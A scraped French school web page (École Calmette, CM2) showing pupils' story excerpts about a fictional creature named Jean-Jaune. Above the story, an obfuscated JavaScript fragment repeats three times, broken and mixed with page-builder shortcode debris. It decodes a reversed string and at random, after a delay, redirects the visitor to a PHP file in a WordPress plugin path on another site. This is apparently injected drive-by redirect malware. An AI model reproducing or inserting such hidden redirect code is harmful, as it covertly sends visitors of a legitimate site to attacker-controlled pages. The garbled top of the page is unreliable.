) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Events Section » _builder_version= »3.2″ custom_padding= »0px||0px| »]
) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Events Section » _builder_version= »3.2″ custom_padding= »0px||0px| »]
) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Events Area » _builder_version= »3.2″]

Ecole Calmette – CM2

Professeur : Florence Chamard

Extraits de l’histoire écrite par les élèves autour du personnage fictif Jean-Jaune.

 

« Jean-Jaune est comme son nom l’indique, jaune. Il est connu chez les Anglo-Saxons sous le nom John Yellow. C’est une boule poilue à 4 bras, 4 jambes et 4 yeux. En plus de son pelage jaune, il a de longs cheveux jaunes et heureusement pour lui, il a la faculté de se transformer en humain. Personne ne sait d’où il vient ni ce qu’il fait au Blanc-Mesnil, mais une chose est sûre, Jean- Jaune est là. »

 

« Une porte cachée s’ouvre vers un passage secret, qu’il emprunte de ce pas. Il voit alors le fantôme du Docteur Calmette qui lui lance un « Calme-toi Jean-Jaune ! Je suis Calmette, tu dois retrouver mon trésor ! » Il découvre un coffre-fort dans ce qu’il appelle « la salle des ténèbres » et qui n’est autre que le bureau du directeur. »

Lisez l’intégralité du texte ici

JEAN JAUNE

Share This